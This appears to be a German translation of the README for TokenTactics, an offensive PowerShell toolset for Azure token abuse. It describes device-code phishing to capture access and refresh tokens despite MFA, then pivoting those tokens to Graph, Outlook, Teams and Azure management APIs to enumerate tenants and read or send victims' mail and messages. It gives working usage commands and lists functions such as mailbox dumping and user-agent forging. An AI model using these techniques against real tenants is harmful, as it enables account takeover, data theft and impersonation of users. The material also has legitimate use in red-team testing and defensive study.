
Azure JWT Token Manipulation Toolset
Azure JSON Web Token („JWT“)-Manipulations-Toolset
Azure-Zugriffstokens ermöglichen es dir, dich als Benutzer, der sich mit einem Gerätecode anmeldet, bei bestimmten Endpunkten zu authentifizieren – selbst wenn dieser die Multi-Faktor-Authentifizierung verwendet hat. Sobald du das Zugriffstoken eines Benutzers hast, ist es möglicherweise möglich, auf bestimmte Apps wie Outlook, SharePoint, OneDrive, MSTeams und weitere zuzugreifen.
Wenn du beispielsweise ein Graph- oder MSGraph-Token hast, kannst du dich mit Azure verbinden und Benutzer, Gruppen usw. auslesen. Anschließend könntest du, abhängig von den Richtlinien für den bedingten Zugriff, zu einem Azure Core Management-Token wechseln und AzureHound ausführen. Danach zu einem Outlook-Token wechseln und E-Mails lesen/senden oder MS Teams-Nachrichten lesen/senden!
Für weitere Informationen zu Azure-Tokentypen: Microsoft identity platform access tokens
Im Ressourcenordner befinden sich einige Beispielanfragen an Endpunkte. Außerdem gibt es dort eine Beispiel-Phishing-Vorlage für Gerätecode-Phishing.
Du kannst diese Tokens auch mit AAD Internals verwenden. Wir empfehlen dringend, dir dieses erstaunliche Tool anzusehen.
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
Sobald sich der Benutzer angemeldet hat, wird dir das JWT angezeigt und in der Variable $response gespeichert. Um auf das Zugriffstoken zuzugreifen, verwende $response.access_token in deinem PowerShell-Fenster, um das Token anzuzeigen. Du kannst das Aktualisierungstoken auch mit $response.refresh_token anzeigen. Hinweis: Du wirst das Aktualisierungstoken benötigen, um immer wieder neue Zugriffstokens zu erhalten! Standardmäßig werden die Ergebnisse von Get-AzureToken in TokenLog.log protokolliert.
Get-AzureToken -Client DODMSGraph
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId [email protected]
Sobald eine PRT erfasst wurde, authentifiziere dich mit roadrecon, um dein access_token und refresh_token zu erhalten. Verwende beim Aktualisieren mit TokenTactics die ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
Get-Command -Module TokenTactics
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-TenantID 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToO365SuiteUXToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
Die Methoden von TokenTactics sind stark beeinflusst von der großartigen Forschung von Dr. Nestori Syynimaa unter https://o365blog.com/.